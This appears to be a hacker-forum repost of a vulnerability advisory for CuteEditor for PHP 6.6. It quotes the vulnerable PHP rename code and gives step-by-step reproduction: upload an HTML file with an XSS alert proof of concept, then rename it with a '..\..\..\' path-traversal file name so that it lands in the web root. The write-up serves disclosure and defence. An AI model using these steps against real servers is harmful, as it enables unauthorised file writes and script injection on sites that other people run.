Jump to content

  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

CuteEditor for PHP 6.6 - Directory Traversal

 Share
HACK1949

By HACK1949,
in CHT Vulnerability database

Recommended Posts

HACK1949 Grand Master

HACK1949

Posted
Posted 
# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
# Google Dork: N/A
# Date: November 17th, 2021
# Exploit Author: Stefan Hesselman
# Vendor Homepage: http://phphtmledit.com/
# Software Link: http://phphtmledit.com/download/phphtmledit.zip
# Version: 6.6
# Tested on: Windows Server 2019
# CVE : N/A

There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.

File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121

Vulnerable code:
[SNIP]
	function ServerMapPath($input_path,$absolute_path,$virtual_path)
	{
	  if($absolute_path!="")
	  {
		return $absolute_path.str_ireplace($virtual_path,"",$input_path);
	  }
	  else
	  {
		if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
		{    
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { 
	$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
} 
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { 
  $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
				return $_SERVER["DOCUMENT_ROOT"].$input_path;
		}
		else
		{
			return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; 
		}
	  }
	}
[SNIP]

ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.

File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56

Vulnerable function (renamefile, line 57):
[SNIP]
switch ($action)
{
[SNIP]
	case "renamefile":
		rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
		print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
		break;
[SNIP]

$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:

C:\Inetpub\wwwroot\..\..\..\poc.html

Final result: writes poc.html to the webroot.

STEPS:

1. Create a poc.html file (XSS PoC will do).

<HTML>
<title>Path Traversal PoC</title>
<BODY>
<h1>PoC</h1>
<script>alert('directory traversal');</script>
</BODY>
</HTML>

2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
3. Select poc.html and select "Rename File".
4. Click on the pencil icon to the right of the poc.html file.
5. Rename file to "..\..\..\poc.html".
6. Press OK. poc.html is written three directories up.

This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.
Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

discussion group

discussion group

  
    You don't have permission to chat.

    • Recently Browsing   0 members

      • No registered users viewing this page.

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • Create New...